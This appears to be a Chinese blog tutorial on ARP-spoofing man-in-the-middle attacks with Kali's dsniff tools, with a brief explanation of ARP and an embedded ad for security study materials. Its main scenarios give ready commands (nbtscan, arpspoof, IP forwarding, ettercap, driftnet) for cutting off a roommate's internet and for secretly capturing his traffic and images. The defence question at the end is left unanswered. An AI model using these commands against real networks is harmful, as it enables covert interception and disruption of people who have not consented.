中間人攻擊之ARP欺騙

合天網安實驗室 發佈 2022-09-24T12:51:07.797885+00:00

針對SSH和SSL的MITM「攻擊」工具,包括sshmitm和webmitm;kali@kali:~#sudo apt-get update #更新軟體列表。

x00、軟體安裝及環境搭建

第一步、Kali下載導入

Kali下載地址(VMware版本):

 https://images.kali.org/virtual-images/kali-Linux-2020.4-vmware-amd64.7z

解壓後,打開VMware,

【——全網最全的網絡安全學習資料包分享給愛學習的你,關注我,私信回復「領取」獲取——】

1.網絡安全多個方向學習路線

2.全網最全的CTF入門學習資料

3.一線大佬實戰經驗分享筆記

4.網安大廠面試題合集

5.紅藍對抗實戰技術秘籍

6.網絡安全基礎入門、Linux、web安全、滲透測試方面視頻


第二步、Dsniff套件安裝

Dsniff是一個基於unix系統網絡嗅探工具。

Dsniff是一個工具集,主要分為四類:

  1. 純粹被動地進行網絡活動監視的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;
  2. 針對ssh和SSL的MITM(Man-In-The-Middle)"攻擊"工具,包括sshmitm和webmitm;
  3. 發起主動欺騙的工具,包括:Arpspoof、dnsspoof、macof;
  4. 其它工具,包括tcpkill、tcpnice。

kali@kali:~#sudo apt-get update #更新軟體列表

kali@kali:~# sudo apt-get install dsniff #從軟體列表中下載安裝dsniff

測試是否安裝成功

我們發現其實運行這個軟體和權限是息息相關的,我們切換root運行

涉及到的軟體都能夠正常運行(本文僅僅涉及到ARPspoof)

0x01、場景一(讓宿舍室友斷網)

第一步、找到室友的ip

NBTSCAN可以獲取到PC的真實IP位址和MAC地址。

nbtscan -r 192.168.10.17/24

第二步、讓他斷網

arpspoof -i 網卡 -t 目標IP 網關

arpspoof -i eth0 -t 192.168.8.213 192.168.8.1

#0x02、場景二(監控室友網絡)

第一步、開啟ip轉發功能(讓他上網)

為使受害者主機的數據包能夠順利收發,我們需在Kali Linux中開啟IP轉發功能

A、開啟:echo 1 > /proc/sys/net/ipv4/ip_forward;

第二步、開啟流量嗅探工具

driftnet 用於抓取網絡流量中的圖片,並將他們顯示出來。ettercap是一個基於ARP地址欺騙方式的網絡嗅探工具,主要適用於交換區域網路。

apt-get install driftnet //安裝driftnet工具

ettercap -Tq -i eth0 //-T是僅使用文本GUI,-q不顯示數據內容,-i是指定網卡

driftnet -i eth0 //選擇監聽埠為eth0

wireshark

0x03、場景三(實戰案例介紹)

0x04、原理分析

第一步、ARP請求

第二步、ARP響應

前提知識:

  1. ARP是幹啥的?

Arp是地址解析協議,通過ip獲取mac地址的協議(同網段才能獲取)

2.為啥要獲取mac地址?

表面上我們看到的是通過ip進行通信,實際上區域網都是通過mac地址進行通信,

0x05、思考題

ARP攻擊應用場景?

ARP攻擊應該如何防護?

關鍵字: